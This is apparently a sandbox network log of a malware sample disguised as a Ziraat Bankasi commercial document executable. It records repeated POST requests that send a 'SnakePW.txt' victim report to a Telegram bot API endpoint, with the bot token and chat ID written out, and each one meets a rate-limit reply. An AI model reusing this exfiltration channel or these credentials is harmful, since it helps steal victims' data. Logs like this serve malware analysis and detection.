                                      2024-09-26 09:00:54 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf17a3acb6994
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:54 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 31 37 61 33 61 63 62 36 39 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf17a3acb6994Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:54 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:54 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 30
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:54 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 30 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 30","parameters":{"retry_after":30}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      66192.168.2.449815149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:55 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf1d37b977030
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:55 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 31 64 33 37 62 39 37 37 30 33 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf1d37b977030Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:55 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:55 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 29
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:55 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 29","parameters":{"retry_after":29}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      67192.168.2.449816149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:56 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf2245aff2ed4
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:56 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 32 34 35 61 66 66 32 65 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf2245aff2ed4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:56 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:56 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 28
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:56 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 38 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 28","parameters":{"retry_after":28}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      68192.168.2.449817149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:57 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf26c929e065d
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:57 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 36 63 39 32 39 65 30 36 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf26c929e065dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:57 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:57 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 27
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:57 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 37 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 27","parameters":{"retry_after":27}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      69192.168.2.449818149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:58 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf2b3164b9386
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:58 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 62 33 31 36 34 62 39 33 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf2b3164b9386Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:58 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:58 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 26
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:58 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 36 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 26","parameters":{"retry_after":26}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      70192.168.2.449819149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:59 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf4c10f13b819
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:59 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 34 63 31 30 66 31 33 62 38 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf4c10f13b819Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:59 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:59 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 25
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:59 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 35 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 25","parameters":{"retry_after":25}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      71192.168.2.449820149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:00 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf51324ab0cc4
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:00 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 31 33 32 34 61 62 30 63 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf51324ab0cc4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:00 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:00 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 24
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:00 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 34 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 24","parameters":{"retry_after":24}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      72192.168.2.449821149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:01 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf570fe652fbf
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:01 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 37 30 66 65 36 35 32 66 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf570fe652fbfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:01 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:01 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 23
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:01 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 23","parameters":{"retry_after":23}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      73192.168.2.449822149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:02 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcf5c1e974e0c1
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:02 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 63 31 65 39 37 34 65 30 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcf5c1e974e0c1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:02 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:02 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 22
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:02 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 32 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 22","parameters":{"retry_after":22}}


